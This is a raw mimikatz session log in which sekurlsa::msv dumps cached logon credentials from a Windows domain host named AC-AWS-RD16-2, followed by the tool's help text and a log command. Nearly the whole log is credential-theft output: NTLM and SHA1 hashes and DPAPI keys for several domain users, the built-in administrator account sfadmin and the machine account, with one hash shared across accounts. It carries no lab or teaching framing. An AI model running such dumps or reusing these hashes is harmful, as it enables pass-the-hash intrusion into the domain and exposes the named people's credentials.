Using 'tmp' for logfile : OK

mimikatz # sekurlsa::msv

Authentication Id : 0 ; 128554547 (00000000:07a99633)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 3:00:25 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 128539904 (00000000:07a95d00)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 2:59:11 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 128140449 (00000000:07a344a1)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 2:32:51 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 127942077 (00000000:07a03dbd)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 2:30:03 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 127370620 (00000000:0797857c)
Session           : RemoteInteractive from 21
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:37:12 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 127370544 (00000000:07978530)
Session           : RemoteInteractive from 21
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:37:12 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 127283446 (00000000:079630f6)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:32:42 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126985098 (00000000:0791a38a)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:14:40 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126814544 (00000000:078f0950)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:09:13 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126670141 (00000000:078cd53d)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:01:34 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126331792 (00000000:0787ab90)
Session           : Interactive from 22
User Name         : DWM-22
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/2/2021 12:38:49 PM
SID               : S-1-5-90-0-22
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 126314617 (00000000:07876879)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:35:16 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126279987 (00000000:0786e133)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:32:01 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126259288 (00000000:07869058)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:30:50 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126013102 (00000000:0782ceae)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:05:37 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 125111963 (00000000:07750e9b)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:42:34 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 124808087 (00000000:07706b97)
Session           : RemoteInteractive from 2
User Name         : svc_file_manager
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:38:38 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1285
	msv :	

Authentication Id : 0 ; 122750286 (00000000:0751054e)
Session           : Interactive from 20
User Name         : sfadmin
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 9:39:13 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-500
	msv :	
	 [00000003] Primary
	 * Username : sfadmin
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : b7c2e1fc362f18134fb5c15044f24421

Authentication Id : 0 ; 118894497 (00000000:07162fa1)
Session           : RemoteInteractive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 8:56:41 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 118882328 (00000000:07160018)
Session           : Interactive from 20
User Name         : DWM-20
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/2/2021 8:56:38 AM
SID               : S-1-5-90-0-20
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 108538736 (00000000:06782b70)
Session           : RemoteInteractive from 13
User Name         : mike
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 6:00:13 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1149
	msv :	

Authentication Id : 0 ; 96579111 (00000000:05c1ae27)
Session           : RemoteInteractive from 19
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 6:24:12 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 92272464 (00000000:057ff750)
Session           : RemoteInteractive from 4
User Name         : svc_file_manager
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 5:36:30 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1285
	msv :	

Authentication Id : 0 ; 84206722 (00000000:0504e482)
Session           : RemoteInteractive from 16
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/28/2021 10:03:41 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 74678834 (00000000:04738232)
Session           : RemoteInteractive from 12
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 2:06:17 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 73904786 (00000000:0467b292)
Session           : RemoteInteractive from 11
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 12:15:49 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 67943894 (00000000:040cbdd6)
Session           : RemoteInteractive from 10
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 5:49:38 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 63592118 (00000000:03ca56b6)
Session           : RemoteInteractive from 9
User Name         : mike
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 2:29:53 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1149
	msv :	

Authentication Id : 0 ; 61600417 (00000000:03abf2a1)
Session           : RemoteInteractive from 8
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 12:19:22 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 61600365 (00000000:03abf26d)
Session           : RemoteInteractive from 8
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 12:19:22 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 61090868 (00000000:03a42c34)
Session           : RemoteInteractive from 5
User Name         : leonid
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 11:46:03 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1136
	msv :	

Authentication Id : 0 ; 58145921 (00000000:03773c81)
Session           : RemoteInteractive from 18
User Name         : yiftach
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 7:48:48 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1257
	msv :	

Authentication Id : 0 ; 44448297 (00000000:02a63a29)
Session           : RemoteInteractive from 6
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/25/2021 7:52:12 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 44448252 (00000000:02a639fc)
Session           : RemoteInteractive from 6
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/25/2021 7:52:12 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 19003627 (00000000:0121f8eb)
Session           : RemoteInteractive from 7
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/21/2021 12:05:56 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 4057407 (00000000:003de93f)
Session           : RemoteInteractive from 3
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/20/2021 8:50:37 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : AC-AWS-RD16-2$
Domain            : AC
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:48 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 128483722 (00000000:07a8818a)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 2:51:50 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 127964602 (00000000:07a095ba)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 2:31:03 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 127266412 (00000000:0795ee6c)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:31:19 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126925929 (00000000:0790bc69)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 1:13:15 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 126348087 (00000000:0787eb37)
Session           : RemoteInteractive from 22
User Name         : yiftach
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:38:53 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1257
	msv :	
	 [00000003] Primary
	 * Username : yiftach
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d8900cb324bd83b161952784f845e926

Authentication Id : 0 ; 126348049 (00000000:0787eb11)
Session           : RemoteInteractive from 22
User Name         : yiftach
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 12:38:53 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1257
	msv :	
	 [00000003] Primary
	 * Username : yiftach
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d8900cb324bd83b161952784f845e926

Authentication Id : 0 ; 126331823 (00000000:0787abaf)
Session           : Interactive from 22
User Name         : DWM-22
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/2/2021 12:38:49 PM
SID               : S-1-5-90-0-22
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 125153075 (00000000:0775af33)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:50:38 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 125095408 (00000000:0774cdf0)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:41:51 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 124992977 (00000000:07733dd1)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:39:11 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 124808120 (00000000:07706bb8)
Session           : RemoteInteractive from 2
User Name         : svc_file_manager
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:38:38 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1285
	msv :	

Authentication Id : 0 ; 124747386 (00000000:076f7e7a)
Session           : Interactive from 20
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 10:35:33 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	
	 [00000003] Primary
	 * Username : Gal
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : d5f32aa27f70580728cf486eb94d1e2d

Authentication Id : 0 ; 123872726 (00000000:076225d6)
Session           : Interactive from 20
User Name         : sfadmin
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 9:52:20 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-500
	msv :	
	 [00000003] Primary
	 * Username : sfadmin
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : b7c2e1fc362f18134fb5c15044f24421

Authentication Id : 0 ; 120098507 (00000000:07288ecb)
Session           : Interactive from 20
User Name         : sfadmin
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 9:07:01 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-500
	msv :	
	 [00000003] Primary
	 * Username : sfadmin
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : b7c2e1fc362f18134fb5c15044f24421

Authentication Id : 0 ; 119340972 (00000000:071cffac)
Session           : Interactive from 20
User Name         : sfadmin
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 5/2/2021 9:00:02 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-500
	msv :	
	 [00000003] Primary
	 * Username : sfadmin
	 * Domain   : AC
	 * NTLM     : d1515a3bd4e48aa359ae1c3cc4d04bf6
	 * SHA1     : 233e96b623897894a739e31969b0db0622fefbbc
	 * DPAPI    : b7c2e1fc362f18134fb5c15044f24421

Authentication Id : 0 ; 118882311 (00000000:07160007)
Session           : Interactive from 20
User Name         : DWM-20
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/2/2021 8:56:38 AM
SID               : S-1-5-90-0-20
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 108538701 (00000000:06782b4d)
Session           : RemoteInteractive from 13
User Name         : mike
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 6:00:13 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1149
	msv :	

Authentication Id : 0 ; 99287720 (00000000:05eb02a8)
Session           : RemoteInteractive from 26
User Name         : gal
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 8:37:06 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1286
	msv :	

Authentication Id : 0 ; 96579565 (00000000:05c1afed)
Session           : RemoteInteractive from 19
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 6:24:12 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 92272511 (00000000:057ff77f)
Session           : RemoteInteractive from 4
User Name         : svc_file_manager
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/29/2021 5:36:30 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1285
	msv :	

Authentication Id : 0 ; 84206689 (00000000:0504e461)
Session           : RemoteInteractive from 16
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/28/2021 10:03:41 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 78669079 (00000000:04b06517)
Session           : RemoteInteractive from 14
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/28/2021 8:43:05 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 74678885 (00000000:04738265)
Session           : RemoteInteractive from 12
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 2:06:17 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 73904863 (00000000:0467b2df)
Session           : RemoteInteractive from 11
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 12:15:49 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 67943942 (00000000:040cbe06)
Session           : RemoteInteractive from 10
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/27/2021 5:49:38 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 63592079 (00000000:03ca568f)
Session           : RemoteInteractive from 9
User Name         : mike
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 2:29:53 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1149
	msv :	

Authentication Id : 0 ; 61090835 (00000000:03a42c13)
Session           : RemoteInteractive from 5
User Name         : leonid
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 11:46:03 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1136
	msv :	

Authentication Id : 0 ; 58145888 (00000000:03773c60)
Session           : RemoteInteractive from 18
User Name         : yiftach
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/26/2021 7:48:48 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1257
	msv :	

Authentication Id : 0 ; 19004116 (00000000:0121fad4)
Session           : RemoteInteractive from 7
User Name         : danielb
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/21/2021 12:05:56 PM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1229
	msv :	

Authentication Id : 0 ; 4057454 (00000000:003de96e)
Session           : RemoteInteractive from 3
User Name         : nativ
Domain            : AC
Logon Server      : AC-AWS-DC12-1
Logon Time        : 4/20/2021 8:50:37 AM
SID               : S-1-5-21-3964176729-1986337963-1454823936-1150
	msv :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:51 PM
SID               : S-1-5-19
	msv :	

Authentication Id : 0 ; 41594 (00000000:0000a27a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:51 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : 1775d45513af80f5348531bb736b48bd
	 * SHA1     : d1ccbed03652be417fdc4ac60098a431ddfb5a47

Authentication Id : 0 ; 41504 (00000000:0000a220)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:51 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 21985 (00000000:000055e1)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:44 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : AC-AWS-RD16-2$
	 * Domain   : AC
	 * NTLM     : e38dc6e883b4be0dbf4b7d11bfa79676
	 * SHA1     : 484286a3591eb4d9f8bbcf8a2141483caa27b538

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : AC-AWS-RD16-2$
Domain            : AC
Logon Server      : (null)
Logon Time        : 4/19/2021 2:36:43 PM
SID               : S-1-5-18
	msv :	

mimikatz # help
ERROR mimikatz_doLocal ; "help" command of "standard" module not found !

Module :	standard
Full name :	Standard module
Description :	Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz # log mylog.log
